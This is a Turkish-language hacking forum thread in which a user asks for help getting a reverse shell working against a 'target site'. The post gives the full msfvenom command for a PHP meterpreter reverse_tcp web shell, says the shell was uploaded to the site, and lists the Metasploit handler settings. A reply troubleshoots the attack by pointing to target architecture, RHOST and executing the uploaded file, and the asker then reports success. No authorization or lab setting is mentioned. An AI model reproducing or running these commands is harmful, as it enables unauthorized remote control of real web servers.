1. Duyuruyu Kapat

php/meterpreter/reverse_tcp

'Soru & Cevap' forumunda SecDeT tarafından 15 Ocak 2017 tarihinde açılan konu

  1. SecDeT

    SecDeT New Member

    Katılım:
    7 Ocak 2017
    Mesaj:
    11
    Beğeniler:
    2
    Ödül Puanları:
    3
    Cinsiyet:
    Erkek
    Herkese Merhaba.
    Bağlantı kuramıyorum.
    Sanal makine üzerine kurulu kali linux ile hedef site üzerinde bağlantı sağlamak için aşağıdaki yöntemi kullanıyorum ancak burada sanırım sanal sunucu ile bağlandığımdan host ya da port konusunda bir yanlışım var bilgisi olan varsa yardımcı olabilir mi ?

    LHOST ifconfig ip

    önce bir php shell oluşturdum.
    msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=1234 -f raw > shell.php
    Bu shell i siteye upload edip
    msfconsole üzerinden;
    use exploit/multi/handler
    set payload php/meterpreter_reverse_tcp
    set LHOST 192.168.1.10
    set LPORT 1234 (ŞİMDİDEN TEŞEKKÜR EDERİM)
     
  2. tababa86

    tababa86 Albay

    Katılım:
    12 Mart 2016
    Mesaj:
    871
    Beğeniler:
    53
    Ödül Puanları:
    28
    Cinsiyet:
    Erkek
    Şehir:
    Kore
    Ben bir bakayım karşı sistem ne.isletim sistemi mimarisi...sonra exploit ettiğin pc nin ip si isteniyor mu?Show optiondan bak..neyse genelde payload da lhost girilir de rhost bilgileri isteniyor mu?msfvenom da eksik olabilir x86 x64 falan...sistemin önemi.gerci belliki php uygulaması exploit ediyon biraz açıklasan iyi olur?
     
  3. tababa86

    tababa86 Albay

    Katılım:
    12 Mart 2016
    Mesaj:
    871
    Beğeniler:
    53
    Ödül Puanları:
    28
    Cinsiyet:
    Erkek
    Şehir:
    Kore
    Bir de sitede exploiti çalıştirdim mı o da önemli upload etmek yetmez...
     
    SecDeT bunu beğendi.
  4. SecDeT

    SecDeT New Member

    Katılım:
    7 Ocak 2017
    Mesaj:
    11
    Beğeniler:
    2
    Ödül Puanları:
    3
    Cinsiyet:
    Erkek
    Sağolun Albayım rhostta istiyomuş.Sorunum çözüldü.
     
    tababa86 bunu beğendi.

Bu Sayfayı Paylaş

Share